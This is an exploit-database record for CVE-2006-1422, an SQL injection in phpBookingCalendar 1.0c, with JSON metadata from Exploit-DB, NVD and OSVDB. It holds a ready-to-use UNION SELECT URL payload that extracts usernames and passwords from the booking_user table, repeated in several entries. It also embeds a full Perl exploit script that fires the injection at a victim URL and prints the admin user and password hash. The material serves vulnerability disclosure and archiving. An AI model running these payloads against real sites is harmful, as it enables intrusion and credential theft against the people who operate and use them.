PoC by undefined1_ @ bash-x.net/undef/
phpBookingCalendar <= 1.0c
"A PHP/MySQL Booking Calendar Application."
http://www.jjwdesign.com/booking_calendar.html
phpBookingCalendar is prone to a sql injection attack. the sql injection works regardless of any magic_quotes_gpc settings.
www.site.com/details_view.php?event_id=1 and 1=0 union all select 1,1,username,1,1,1,1,1,1,passwd,1,1,1 from booking_user
# milw0rm.com [2006-03-25]
{"id": "EDB-ID:1610", "hash": "8d240e64b1e5d3bcba61002d9c7e6d2c", "type": "exploitdb", "bulletinFamily": "exploit", "title": "phpBookingCalendar <= 1.0c - details_view.php Remote SQL Injection", "description": "phpBookingCalendar <= 1.0c [details_view.php] Remote SQL Injection. CVE-2006-1422. Webapps exploit for php platform", "published": "2006-03-25T00:00:00", "modified": "2006-03-25T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/1610/", "reporter": "undefined1_", "references": [], "cvelist": ["CVE-2006-1422"], "lastseen": "2016-01-31T14:32:45", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2016-01-31T14:32:45"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-1422"]}, {"type": "exploitdb", "idList": ["EDB-ID:5696"]}, {"type": "osvdb", "idList": ["OSVDB:31624"]}], "modified": "2016-01-31T14:32:45"}, "vulnersScore": 7.4}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/1610/", "sourceData": "PoC by undefined1_ @ bash-x.net/undef/\n\nphpBookingCalendar <= 1.0c\n\"A PHP/MySQL Booking Calendar Application.\"\nhttp://www.jjwdesign.com/booking_calendar.html\n\nphpBookingCalendar is prone to a sql injection attack. the sql injection works regardless of any magic_quotes_gpc settings.\nwww.site.com/details_view.php?event_id=1 and 1=0 union all select 1,1,username,1,1,1,1,1,1,passwd,1,1,1 from booking_user\n\n# milw0rm.com [2006-03-25]\n", "osvdbidlist": ["31624"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:08:31", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in details_view.php in PHP Booking Calendar 1.0c and earlier allows remote attackers to execute arbitrary SQL commands via the event_id parameter.", "modified": "2017-10-11T01:30:00", "id": "CVE-2006-1422", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1422", "published": "2006-03-28T20:02:00", "title": "CVE-2006-1422", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2016-01-31T22:27:17", "bulletinFamily": "exploit", "description": "PHP Booking Calendar 10 d Remote SQL Injection Exploit. CVE-2006-1422. Webapps exploit for php platform", "modified": "2008-05-29T00:00:00", "published": "2008-05-29T00:00:00", "id": "EDB-ID:5696", "href": "https://www.exploit-db.com/exploits/5696/", "type": "exploitdb", "title": "PHP Booking Calendar 10 d Remote SQL Injection Exploit", "sourceData": "# Portal :PHP Booking Calendar 10 d (sql/upload) Exploit\r\n# Modified 2008\r\n# Download : https://sourceforge.net/project/showfiles.php?group_id=132702\r\n# exploit aported password crypted\r\n########################################\r\n#[*] Founded & Exploited by : Stack\r\n#[*] Contact: Ev!L =>> see down\r\n#[*] Greetz : Houssamix & Djekmani & Jadi & iuoisn & Str0ke & All muslims HaCkeRs :)\r\n################################################################################\r\n# Exploit-DB Note (May 28th 2012)\r\n# PHP Booking Calendar 10e is also affected by this\r\n#\r\n#\r\n#!/usr/bin/perl -w\r\n########################################\r\n# * TITLE: PerlSploit Class\r\n# * REQUIREMENTS: PHP 4 / PHP 5\r\n# * VERSION: v.1\r\n# * LICENSE: GNU General Public License\r\n# * ORIGINAL URL: http://www.v4-Team/v4.txt\r\n# * FILENAME: PerlSploitClass.pl\r\n# *\r\n# * CONTACT: Wanted :\r\n# * THNX : AllaH\r\n# * GREETZ: Houssamix & Djekmani\r\n########################################\r\n#----------------------------------------------------------------------------#\r\n########################################\r\nsystem(\"color 02\");\r\nprint \"\\t\\t############################################################\\n\\n\";\r\nprint \"\\t\\t# PHP Booking Calendar 10 d - Remote SQL Inj Exploit #\\n\\n\";\r\nprint \"\\t\\t# by Stack #\\n\\n\";\r\nprint \"\\t\\t############################################################\\n\\n\";\r\n########################################\r\n#----------------------------------------------------------------------------#\r\n########################################\r\nuse LWP::UserAgent;\r\ndie \"Example: perl $0 http://victim.com/path/\\n\" unless @ARGV;\r\nsystem(\"color f\");\r\n########################################\r\n#----------------------------------------------------------------------------#\r\n########################################\r\n#the username of news manages\r\n$user=\"username\";\r\n#the pasword of news manages\r\n$pass=\"passwd\";\r\n#the tables of news manages\r\n$tab=\"booking_user\";\r\n$fil=\"details_view.php\";\r\n$varo=\"event_id\";\r\n########################################\r\n#----------------------------------------------------------------------------#\r\n########################################\r\n$b = LWP::UserAgent->new() or die \"Could not initialize browser\\n\";\r\n$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');\r\n########################################\r\n#----------------------------------------------------------------------------#\r\n########################################\r\n$host = $ARGV[0] . \"/\".$fil.\"?\".$varo.\"=-1+union+all+select+1,1,concat_ws(char(58),char(58),\".$user.\",char(58),char(58),char(58),char(58)),1,1,1,1,1,1,\".$pass.\",1,1,1 from+\".$tab.\"/*\";\r\n$res = $b->request(HTTP::Request->new(GET=>$host));\r\n$answer = $res->content;\r\n########################################\r\n#----------------------------------------------------------------------------#\r\n########################################\r\nif ($answer =~ /::(.*?)::::/){\r\n print \"\\nBrought to you by v4-team.com...\\n\";\r\n print \"\\n[+] Admin User : $1\";\r\n}\r\n########################################\r\n#----------------------------------------------------------------------------#\r\n########################################\r\nif ($answer =~/([0-9a-fA-F]{32})/){print \"\\n[+] Admin Hash : $1\\n\\n\";\r\nprint \"\\t\\t# Exploit has ben aported user and password hash #\\n\\n\";}\r\nelse{print \"\\n[-] Exploit Failed...\\n\";}\r\n########################################\r\n#-------------------Exploit exploited by Stack --------------------#\r\n########################################\r\n\r\n# milw0rm.com [2008-05-29]\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/5696/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/details_view.php?event_id=1 and 1=0 union all select 1,1,username,1,1,1,1,1,1,passwd,1,1,1 from booking_user\n## References:\nVendor URL: http://www.jjwdesign.com/booking_calendar.html\nISS X-Force ID: 25580\nGeneric Exploit URL: http://www.milw0rm.com/exploits/1610\n[CVE-2006-1422](https://vulners.com/cve/CVE-2006-1422)\nBugtraq ID: 17230\n", "modified": "2006-03-25T21:38:21", "published": "2006-03-25T21:38:21", "href": "https://vulners.com/osvdb/OSVDB:31624", "id": "OSVDB:31624", "title": "PHP Booking Calendar details_view.php event_id SQL Injection", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}
